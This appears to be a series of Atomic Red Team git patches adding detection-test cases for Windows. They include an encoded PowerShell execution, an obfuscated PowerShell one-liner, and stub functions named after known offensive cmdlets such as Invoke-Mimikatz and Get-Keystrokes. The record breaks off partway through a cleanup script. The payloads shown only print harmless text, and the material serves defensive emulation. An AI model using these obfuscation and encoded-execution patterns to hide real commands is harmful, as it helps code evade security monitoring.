files changed, 58 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 617fec9f..0da994fb 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -798,6 +798,7 @@ execution,T1059.001,PowerShell,15,ATHPowerShellCommandLineParameter -Command par execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell +execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt execution,T1059.006,Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh execution,T1059.006,Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh execution,T1059.006,Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 87b366f5..d65ae1a4 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -571,6 +571,7 @@ execution,T1059.001,PowerShell,15,ATHPowerShellCommandLineParameter -Command par execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell +execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 868bc4f7..d7882ffa 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1436,6 +1436,7 @@ - Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows] - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] + - Atomic Test #19: PowerShell Command Execution [windows] - [T1059.006 Python](../../T1059.006/T1059.006.md) - Atomic Test #1: Execute shell script via python's command mode arguement [linux] - Atomic Test #2: Execute Python via scripts (Linux) [linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 3fc9f744..96a6d79c 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1039,6 +1039,7 @@ - Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows] - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] + - Atomic Test #19: PowerShell Command Execution [windows] - T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) - Atomic Test #1: Scheduled Task Startup Script [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 9f6d2752..2d41ec4d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -60105,6 +60105,25 @@ execution: -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop' name: powershell + - name: PowerShell Command Execution + auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598 + description: 'Use of obfuscated PowerShell to execute an arbitrary command; + outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection + Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + obfuscated_code: + description: 'Defaults to: Invoke-Expression with a "Write-Host" line.' + type: string + default: JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA== + executor: + command: 'powershell.exe -e #{obfuscated_code} + +' + name: command_prompt T1059.006: technique: external_references: diff --git a/atomics/T1059.001/T1059.001.md b/atomics/T1059.001/T1059.001.md index d86d109d..4f969e4f 100644 --- a/atomics/T1059.001/T1059.001.md +++ b/atomics/T1059.001/T1059.001.md @@ -46,6 +46,8 @@ PowerShell commands/scripts can also be executed without directly invoking the < - [Atomic Test #18 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments](#atomic-test-18---athpowershellcommandlineparameter--encodedcommand-parameter-variations-with-encoded-arguments) +- [Atomic Test #19 - PowerShell Command Execution](#atomic-test-19---powershell-command-execution) +
@@ -768,4 +770,37 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +
+
+ +## Atomic Test #19 - PowerShell Command Execution +Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** a538de64-1c74-46ed-aa60-b995ed302598 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| obfuscated_code | Defaults to: Invoke-Expression with a "Write-Host" line. | string | JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +powershell.exe -e #{obfuscated_code} +``` + + + + + +
From e258cdf9f1155e8b2a10e99605c9c0ca0dde7c1b Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Tue, 27 Jul 2021 14:49:47 +0000 Subject: [PATCH 17/29] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 18f2acca..89525732 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -735,3 +735,4 @@ d400090a-d8ca-4be0-982e-c70598a23de9 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 d0eb3597-a1b3-4d65-b33b-2cda8d397f20 a538de64-1c74-46ed-aa60-b995ed302598 +8b3f4ed6-077b-4bdd-891c-2d237f19410f From 60fab6394abbada3aedac4a0385b055504f6d932 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 27 Jul 2021 14:49:54 +0000 Subject: [PATCH 18/29] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 19 ++++++++++++ atomics/T1027/T1027.md | 30 +++++++++++++++++++ 6 files changed, 53 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 0da994fb..c67c4dc4 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -401,6 +401,7 @@ defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded P defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell +defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in PowerShell,8b3f4ed6-077b-4bdd-891c-2d237f19410f,powershell defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index d65ae1a4..b57127be 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -272,6 +272,7 @@ defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded P defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell +defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in PowerShell,8b3f4ed6-077b-4bdd-891c-2d237f19410f,powershell defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index d7882ffa..7b38c148 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -685,6 +685,7 @@ - Atomic Test #4: Execution from Compressed File [windows] - Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows] - Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows] + - Atomic Test #7: Obfuscated Command in PowerShell [windows] - [T1218.008 Odbcconf](../../T1218.008/T1218.008.md) - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows] - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 96a6d79c..15874bdd 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -489,6 +489,7 @@ - Atomic Test #4: Execution from Compressed File [windows] - Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows] - Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows] + - Atomic Test #7: Obfuscated Command in PowerShell [windows] - [T1218.008 Odbcconf](../../T1218.008/T1218.008.md) - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows] - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 2d41ec4d..0159b6df 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -29529,6 +29529,25 @@ defense-evasion: executor: command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} +' + name: powershell + - name: Obfuscated Command in PowerShell + auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f + description: 'This is an obfuscated PowerShell command which when executed prints + "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report + by Red Canary. + +' + supported_platforms: + - windows + executor: + command: '$cmDwhy =[TyPe]("{0}{1}" -f ''S'',''TrING'') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f''nv'',''cO'',''ert'') ; &("{0}{2}{3}{1}{4}" + -f''In'',''SiO'',''vOKe-EXp'',''ReS'',''n'') ( (&("{1}{2}{0}"-f''blE'',''gET-'',''vaRIA'') (''CMdw''+''h''+''y''))."v`ALUe"::("{1}{0}" + -f''iN'',''jO'').Invoke('''',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 + , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, + 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .(''%'') { ( + [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) + ' name: powershell T1218.008: diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md index e40093ff..93dfbd53 100644 --- a/atomics/T1027/T1027.md +++ b/atomics/T1027/T1027.md @@ -22,6 +22,8 @@ Adversaries may also obfuscate commands executed from payloads or directly via a - [Atomic Test #6 - DLP Evasion via Sensitive Data in VBA Macro over HTTP](#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http) +- [Atomic Test #7 - Obfuscated Command in PowerShell](#atomic-test-7---obfuscated-command-in-powershell) +
@@ -266,4 +268,32 @@ Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} +
+
+ +## Atomic Test #7 - Obfuscated Command in PowerShell +This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 8b3f4ed6-077b-4bdd-891c-2d237f19410f + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f'nv','cO','ert') ; &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') ( (&("{1}{2}{0}"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) +``` + + + + + +
From e4b9e082e987a5e3c8234337434187312f17e230 Mon Sep 17 00:00:00 2001 From: tlor89 <60741301+tlor89@users.noreply.github.com> Date: Tue, 27 Jul 2021 10:25:16 -0500 Subject: [PATCH 19/29] T1059.001_Update (#1564) * T1059.001_Update * Update T1059.001.yaml Co-authored-by: Toua Lor Co-authored-by: Carrie Roberts --- atomics/T1059.001/T1059.001.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml index 4ab3d989..93a8b505 100644 --- a/atomics/T1059.001/T1059.001.yaml +++ b/atomics/T1059.001/T1059.001.yaml @@ -391,3 +391,23 @@ atomic_tests: command: | powershell.exe -e #{obfuscated_code} name: command_prompt + +- name: PowerShell Invoke Known Malicious Cmdlets + description: Powershell execution of known Malicious PowerShell Cmdlets + supported_platforms: + - windows + input_arguments: + Malicious_cmdlets: + description: Known Malicious Cmdlets + type: String + default: | + "Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord" + executor: + name: powershell + elevation_required: true + command: | + $malcmdlets = #{Malicious_cmdlets} + foreach ($cmdlets in $malcmdlets) { + "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"} + foreach ($cmdlets in $malcmdlets) { + $cmdlets} \ No newline at end of file From 5f79e55dd6a8c49db59c685c16894ebc3b31fec2 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Tue, 27 Jul 2021 15:25:40 +0000 Subject: [PATCH 20/29] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1059.001/T1059.001.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml index 93a8b505..15509f08 100644 --- a/atomics/T1059.001/T1059.001.yaml +++ b/atomics/T1059.001/T1059.001.yaml @@ -393,6 +393,7 @@ atomic_tests: name: command_prompt - name: PowerShell Invoke Known Malicious Cmdlets + auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3 description: Powershell execution of known Malicious PowerShell Cmdlets supported_platforms: - windows diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 89525732..c2b48803 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -736,3 +736,4 @@ d400090a-d8ca-4be0-982e-c70598a23de9 d0eb3597-a1b3-4d65-b33b-2cda8d397f20 a538de64-1c74-46ed-aa60-b995ed302598 8b3f4ed6-077b-4bdd-891c-2d237f19410f +49eb9404-5e0f-4031-a179-b40f7be385e3 From fa1709c41570da82c3c8888a1daf7a6bb05c6e69 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 27 Jul 2021 15:25:46 +0000 Subject: [PATCH 21/29] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 30 ++++++++++++++ atomics/T1059.001/T1059.001.md | 39 +++++++++++++++++++ 6 files changed, 73 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index c67c4dc4..8d7202ba 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -800,6 +800,7 @@ execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command par execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt +execution,T1059.001,PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell execution,T1059.006,Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh execution,T1059.006,Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh execution,T1059.006,Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index b57127be..47d624b0 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -573,6 +573,7 @@ execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command par execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt +execution,T1059.001,PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 7b38c148..a33b6acb 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1438,6 +1438,7 @@ - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] - Atomic Test #19: PowerShell Command Execution [windows] + - Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows] - [T1059.006 Python](../../T1059.006/T1059.006.md) - Atomic Test #1: Execute shell script via python's command mode arguement [linux] - Atomic Test #2: Execute Python via scripts (Linux) [linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 15874bdd..5815b8eb 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1041,6 +1041,7 @@ - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] - Atomic Test #19: PowerShell Command Execution [windows] + - Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows] - T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) - Atomic Test #1: Scheduled Task Startup Script [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 0159b6df..0d1b19f1 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -60143,6 +60143,36 @@ execution: ' name: command_prompt + - name: PowerShell Invoke Known Malicious Cmdlets + auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3 + description: Powershell execution of known Malicious PowerShell Cmdlets + supported_platforms: + - windows + input_arguments: + Malicious_cmdlets: + description: Known Malicious Cmdlets + type: String + default: '"Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", + "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", + "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", + "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", + "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", + "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", + "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", + "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", + "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", + "Set-CriticalProcess", "Set-MasterBootRecord" + +' + executor: + name: powershell + elevation_required: true + command: |- + $malcmdlets = #{Malicious_cmdlets} + foreach ($cmdlets in $malcmdlets) { + "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"} + foreach ($cmdlets in $malcmdlets) { + $cmdlets} T1059.006: technique: external_references: diff --git a/atomics/T1059.001/T1059.001.md b/atomics/T1059.001/T1059.001.md index 4f969e4f..f780b418 100644 --- a/atomics/T1059.001/T1059.001.md +++ b/atomics/T1059.001/T1059.001.md @@ -48,6 +48,8 @@ PowerShell commands/scripts can also be executed without directly invoking the < - [Atomic Test #19 - PowerShell Command Execution](#atomic-test-19---powershell-command-execution) +- [Atomic Test #20 - PowerShell Invoke Known Malicious Cmdlets](#atomic-test-20---powershell-invoke-known-malicious-cmdlets) +
@@ -803,4 +805,41 @@ powershell.exe -e #{obfuscated_code} +
+
+ +## Atomic Test #20 - PowerShell Invoke Known Malicious Cmdlets +Powershell execution of known Malicious PowerShell Cmdlets + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 49eb9404-5e0f-4031-a179-b40f7be385e3 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| Malicious_cmdlets | Known Malicious Cmdlets | String | "Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord"| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +$malcmdlets = #{Malicious_cmdlets} +foreach ($cmdlets in $malcmdlets) { + "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"} +foreach ($cmdlets in $malcmdlets) { + $cmdlets} +``` + + + + + +
From 99335067a395950cc7cbb4b61b3f135f1484b5ae Mon Sep 17 00:00:00 2001 From: tlor89 <60741301+tlor89@users.noreply.github.com> Date: Tue, 27 Jul 2021 10:31:11 -0500 Subject: [PATCH 22/29] T1219_Update (#1566) Co-authored-by: Toua Lor Co-authored-by: Carrie Roberts --- atomics/T1219/Bin/GoToCleanup.ps1 | 14 ++++++++++++++ atomics/T1219/T1219.yaml | 14 ++++++++++++++ 2 files changed, 28 insertions(+) create mode 100644 atomics/T1219/Bin/GoToCleanup.ps1 diff --git a/atomics/T1219/Bin/GoToCleanup.ps1 b/atomics/T1219/Bin/GoToCleanup.ps1 new file mode 100644 index 00000000..f4ae96de --- /dev/null +++ b/atomics/T1219/Bin/GoToCleanup.ps1 @@ -0,0 +1,14 @@ +# GoTo Opener - delete registry install key because it can't be called by the system +$InstalledApp = "GoTo Opener" +$Keys = Get-ChildItem -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall -ErrorAction SilentlyContinue +$Items = $Keys | Get-ItemProperty | where-object {$_.DisplayName -eq $InstalledApp} +If ($Items) { + $KeyToDelete = $Items.PSPath + Remove-Item $KeyToDelete -Recurse -Force -ErrorAction SilentlyContinue +} +# GoTo Opener - delete user directories +Get-ChildItem "C:\Users\*\AppData" "GoTo Opener" -Recurse -Force -ErrorAction SilentlyContinue | ForEach-Object { + $Directory = $_.ToString() + Remove-Item $Directory -Recurse -Force -ErrorAction SilentlyContinue + } +Start-Process -FilePath "C:\Program Files (x86)\GoToAssist Remote Support 